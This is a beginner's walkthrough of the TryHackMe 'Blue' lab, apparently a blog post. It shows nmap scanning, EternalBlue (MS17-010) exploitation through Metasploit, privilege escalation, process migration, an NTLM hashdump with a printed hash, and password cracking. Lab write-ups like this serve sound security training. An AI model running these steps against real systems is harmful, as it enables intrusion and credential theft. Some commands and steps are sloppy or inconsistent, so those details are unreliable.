TryHackMe Walkthrough : Blue

tryhackme.com
machine information

Hello guys back again with walkthrough this time i am going to be showing you how i exploited blue a virtual machine on TryHackMe. I specifically chose this machine because it can be a good start for people who wants to be penetration testers

  • There are 5 tasks to solve. Recon, Gain Acess, Escalate, Cracking, Find flags!
  • There are two important open ports on machine 139 and 445.
  • SMB on ports 139 (NetBios) and port 445
  • Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
  • There is an important vulnerable eternal blue inside system.
  • Port 445: Later versions of SMB (after Windows 2000) began to use port 445 on top of a TCP stack. Using TCP allows SMB to work over the internet.

Let’s start with this machine.

The “blue” machine IP is 10.10.209.91

We are going to apply the usual methodology of penetration testing as we have applied before. Let’s start with enumeration learn as much about the machine as possible.

Enumaration

We are going to start with the nmap scan to gather more information about the services and version running on this machine.

nmap -T4 -A -p- 10.10.209.91
nmap scan

As we can see, ports 139 and 445 are open. If you ask what it means, it shows there is a smb port opening. Server Message Block (SMB) is an application layer (layer 7) protocol that is widely used for file, port, named pipe and printer sharing. It is a client-server communication protocol. Let’s start again do an nmap script vuln scan.

nmap --script vuln 10.10.209.91 -vv
nmap vuln

We have go to research this vulnerable ms17–010.

We found it, there is an important vulnerability and exploit eternal blue.

eternal blue exploit
#1
msfconsole
metaploit

While doing this, we get help from the search in metasploit.

search eternal blue

We used use 15 because we found the exploit module in the above research.

show options
set rhosts 10.10.209.91
exploit

Success!!!

We going to google and search the how do doing shell to metepreter.

set session 1
exploit
options
session 2
getsystem
whoami
ctrl + z or background
ps
migrate 780 
hashdump

Copy to file, it’s NTLM hash.

We going to “crackstation” and then copy jon’s hash it will be help us for found the password.

The WIndows OS used to rely on LM hashing to store passwords (LM Hash Details) but has since moved over to using NTLM.

Looking at the hashdump above we can break one of them down into it’s component parts :

User: Jon
RID: 1000
LM hash: aad3b435b51404eeaad3b435b51404ee
NT hash: ffb43f0de35be4d9917ac0cc8ad57f8d

We found it.

You can find where is each all flag by using the Windows *flag*txt /s command.

dir *file*txt /s

You can view the contents of each flag by using the Windows type command.

type file.txt

Now that we’ve found the three flags lets complete the task.

Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!

Interested in Cyber Security Engineering